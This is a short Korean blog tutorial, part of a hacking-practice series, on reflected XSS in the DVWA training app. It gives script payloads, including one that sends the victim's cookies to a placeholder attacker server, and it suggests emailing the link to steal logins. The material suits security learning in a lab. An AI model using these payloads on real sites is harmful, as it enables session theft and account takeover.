본문 바로가기

해킹 슈퍼 기초 연습

dvwa xss reflected

이전의 xss 공격은 서버에 공격 스크립트를 저장해 두고 이를 유저가 보게 만들었습니다. 이번에는 서버에 저장되지 않을 때 어떻게 하는지에 대한 것입니다.

 

dvwa의 xss reflected로 갑니다.

 

여기서 <script>alert('!')</script>를 입력합니다. 그럼 아래처럼 알림이 나옵니다.

 

즉, 저희가 원하는 스크립트를 실행할 수 있다는 뜻입니다.

그리고 url을 보면 저희가 넣은 값이 인코딩된 채로 보여집니다.

http://172.30.1.7/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27%21%27%29%3C%2Fscript%3E#

 

쿠키를 탈취해 로그인 정보를 가져옵시다.

<script>alert(document.cookie)</script>를 하면 쿠키를 얻을 수 있습니다.

 

그리고 document.location으로 특정 사이트로 이동시킬 수 있습니다.

<script>document.location='https://www.naver.com'</script>

그렇다면 공격자가 만든 웹 서버로 쿠키 정보를 담아 이동시킬 수도 있습니다.

<script>document.location='{공격자 서버 ip}?'+document.cookie</script>

 

이 링크를 메일로 보내면 로그인 정보를 얻을 수 있습니다.

'해킹 슈퍼 기초 연습' 카테고리의 다른 글

webgoat 사용법  (0) 2024.08.28
webgoat 세팅  (0) 2024.08.21
dvwa sql injection (blind)  (0) 2024.08.06
dvwa CSRF  (0) 2024.08.03
dvwa Command Execution  (0) 2024.07.27